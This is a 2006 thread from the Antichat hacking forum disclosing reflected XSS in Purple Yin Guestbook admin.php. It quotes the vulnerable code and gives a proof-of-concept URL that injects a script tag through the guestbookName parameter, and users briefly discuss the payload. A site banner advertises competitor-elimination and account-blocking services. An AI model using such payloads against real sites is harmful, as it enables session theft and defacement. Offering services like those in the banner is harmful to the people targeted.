FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
Пассивные XSS в Purple Yin Guestbook Version <=1.1.2
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
Пассивные XSS в Purple Yin Guestbook Version <=1.1.2
#
1
23.09.2006, 02:25
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
С нами:
10762826
Репутация:
1348
Пассивные XSS в Purple Yin Guestbook Version <=1.1.2
Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения.
Пример бажного кода admin.php:
$guestbookName=GUESTBOOK_NAME;
.....
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>
Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.
Proof of concept:
http://site.com/guestbook/
admin.php?guestbookName="><script>alert(/XSS/)</script>
Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.
P. S. Работает в Internet Explorer
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 23.09.2006 в
02:33
..
1ten0.0net1
Посмотреть профиль
Репутация
Отправить личное сообщение для 1ten0.0net1
Посетить домашнюю страницу 1ten0.0net1
Найти все сообщения от 1ten0.0net1
Добавить в друзья
#
2
23.09.2006, 08:40
[hidden]
Участник форума
Регистрация: 05.11.2005
Сообщений: 103
С нами:
10796470
Репутация:
31
Может, я чего-то не догоняю, но если заходить по адресу
http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>
то это преобразуется в
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td>
Может, можно обойтись
http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ?
Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..
[hidden]
Посмотреть профиль
Репутация
Отправить личное сообщение для [hidden]
Найти все сообщения от [hidden]
Добавить в друзья
#
3
24.09.2006, 02:08
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами:
10374086
Репутация:
1745
Пригодиться!
KPOT_f!nd
Посмотреть профиль
Репутация
Отправить личное сообщение для KPOT_f!nd
Найти все сообщения от KPOT_f!nd
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Xss для новичков
Micr0b
Уязвимости
79
06.07.2018
22:05
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.